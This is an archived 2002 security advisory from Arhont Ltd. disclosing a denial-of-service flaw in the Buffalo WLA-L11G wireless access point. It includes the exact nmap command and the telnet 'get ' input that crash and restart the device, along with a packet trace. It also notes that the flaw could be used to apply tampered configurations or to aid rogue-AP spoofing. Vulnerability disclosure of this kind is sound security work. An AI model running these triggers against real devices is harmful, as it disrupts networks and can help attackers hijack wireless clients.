('binary' encoding is not supported, stored as-is) Arhont Ltd. - Information Security Arhont Advisory by: Andrei Mikhailovsky (www.arhont.com) Advisory: Buffalo AP AP Model Name: WLA-L11G Ver.2.31 Wireless Firmware: WLI-PCM-L11G Ver.6.14 Model Specific: Other versions of Buffalo APs might be vulnerable Manufacturer site: http://www.buffalotech.com Manufacturer contact: infoat_private Contact Date: 25/10/2002 DETAILS: While performing a network testing, we have found a Buffalo Access Point (WLA-L11G Ver.2.31) vulnerable to a Denial of Service (DoS) attack. Simply using network scanning tool such as nmap with version grabbing (www.insecure.org) in the following manner restarts the AP: $ nmap -sVVV -p 80 192.168.177.250 where 192.168.177.250 is an IP address of Buffalo AP Analysing network traffic shows the following: 14:16:14.622714 192.168.177.7.34968 > 192.168.177.250.www: S [tcp sum ok] 4001152576:4001152576(0) win 5840 <mss 1460,sackOK,timestamp 51 43788 0,nop,wscale 0> (DF) [tos 0x10] (ttl 64, id 49836, len 60) 0x0000 4510 003c c2ac 4000 4006 5bad c0a8 4d07 E..<..@.@.[...M. 0x0010 c0a8 4dfa 8898 0050 ee7c be40 0000 0000 ..M....P.|.@.... 0x0020 a002 16d0 6204 0000 0204 05b4 0402 080a ....b........... 0x0030 004e 7cec 0000 0000 0103 0300 .N|......... 14:16:14.623498 192.168.177.250.www > 192.168.177.7.34968: S [tcp sum ok] 51008176:51008176(0) ack 4001152577 win 16000 <mss 1460> (ttl 3 0, id 2, len 44) 0x0000 4500 002c 0002 0000 1e06 8078 c0a8 4dfa E..,.......x..M. 0x0010 c0a8 4d07 0050 8898 030a 52b0 ee7c be41 ..M..P....R..|.A 0x0020 6012 3e80 b1e2 0000 0204 05b4 0000 `.>........... 14:16:14.623539 192.168.177.7.34968 > 192.168.177.250.www: . [tcp sum ok] 1:1(0) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49837, len 4 0) 0x0000 4510 0028 c2ad 4000 4006 5bc0 c0a8 4d07 E..(..@.@.[...M. 0x0010 c0a8 4dfa 8898 0050 ee7c be41 030a 52b1 ..M....P.|.A..R. 0x0020 5010 16d0 f14f 0000 P....O.. 14:16:15.402518 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 1:7(6) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49838, len 4 6) 0x0000 4510 002e c2ae 4000 4006 5bb9 c0a8 4d07 E.....@.@.[...M. 0x0010 c0a8 4dfa 8898 0050 ee7c be41 030a 52b1 ..M....P.|.A..R. 0x0020 5018 16d0 08b2 0000 6765 7420 0d0a P.......get... 14:16:15.647578 192.168.177.250.www > 192.168.177.7.34968: . [tcp sum ok] 1:1(0) ack 7 win 16000 (ttl 30, id 3, len 40) 0x0000 4500 0028 0003 0000 1e06 807b c0a8 4dfa E..(.......{..M. 0x0010 c0a8 4d07 0050 8898 030a 52b1 ee7c be47 ..M..P....R..|.G 0x0020 5010 3e80 c999 0000 0000 0000 0000 P.>........... 14:16:15.647639 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49839, len 4 2) 0x0000 4510 002a c2af 4000 4006 5bbc c0a8 4d07 E..*..@.@.[...M. 0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1 ..M....P.|.G..R. 0x0020 5018 16d0 e435 0000 0d0a P....5.... 14:16:16.358599 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49840, len 4 2) 0x0000 4510 002a c2b0 4000 4006 5bbb c0a8 4d07 E..*..@.@.[...M. 0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1 ..M....P.|.G..R. 0x0020 5018 16d0 e435 0000 0d0a P....5.... 14:16:17.750198 arp who-has 192.168.177.250 tell 192.168.177.250 0x0000 0001 0800 0604 0001 0007 4006 0656 c0a8 ..........@..V.. 0x0010 4dfa 0000 0000 0000 c0a8 4dfa 0000 0000 M.........M..... 0x0020 0000 0000 0000 0000 0000 0000 0000 .............. 14:16:17.798596 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49841, len 4 2) 0x0000 4510 002a c2b1 4000 4006 5bba c0a8 4d07 E..*..@.@.[...M. 0x0010 c0a8 4dfa 8898 0050 ee7c be47 030a 52b1 ..M....P.|.G..R. 0x0020 5018 16d0 e435 0000 0d0a P....5.... 14:16:20.274463 arp who-has 192.168.177.7 tell 192.168.177.250 0x0000 0001 0800 0604 0001 0007 4006 0656 c0a8 ..........@..V.. 0x0010 4dfa 0000 0000 0000 c0a8 4d07 0000 0000 M.........M..... 0x0020 0000 0000 0000 0000 0000 0000 0000 .............. 14:16:20.274488 arp reply 192.168.177.7 is-at 0:4:5a:63:a4:be 0x0000 0001 0800 0604 0002 0004 5a63 a4be c0a8 ..........Zc.... 0x0010 4d07 0007 4006 0656 c0a8 4dfa M...@..V..M. 14:16:20.275495 192.168.177.250.www > 192.168.177.7.34968: FR [tcp sum ok] 51008177:51008177(0) win 0 (ttl 30, id 1, len 40) 0x0000 4500 0028 0001 0000 1e06 807d c0a8 4dfa E..(.......}..M. 0x0010 c0a8 4d07 0050 8898 030a 52b1 0000 0000 ..M..P....R..... 0x0020 5005 0000 b4e9 0000 0000 0000 0000 P............. Attacks can also be reproduced manually via telnet: andreiat_private:~$ telnet 192.168.177.250 80 Trying 192.168.177.250... Connected to 192.168.177.250 (192.168.177.250). Escape character is '^]'. GET / HTTP/1.0 Connection closed by foreign host. and andreiat_private:~$ telnet 192.168.177.250 80 Trying 192.168.177.250... Connected to 192.168.177.250 (192.168.177.250). Escape character is '^]'. get Connection closed by foreign host. (where, there is a <space> after get; without the <space>, the AP doesn't restart) Impact: This vulnerability can be implemented by the attacker to restart the AP. This might be useful if the configuration files have been changed by the attacker and the AP restart is required to implement the changes. It is also possible to implement this attack to spoof an AP and make the clients connect to rouge or spoofed AP instead of legitimate one. Risk Factor: Medium/High According to the Arhont Ltd. policy, all of the found vulnerabilities and security issues will be reported to the manufacturer 7 days before releasing to public domain (such as CERT and BUGTRAQ). If you would like to get more information about this issue, please do not hesitate to contact Arhont team. Regards, Andrei Mikhailovsky Arhont Ltd. http://www.arhont.com GnuPG Keyserver: blackhole.pca.dfn.de GnuPG Key: 0x178F548C
This archive was generated by hypermail 2b30 : Sat Nov 16 2002 - 00:59:14 PST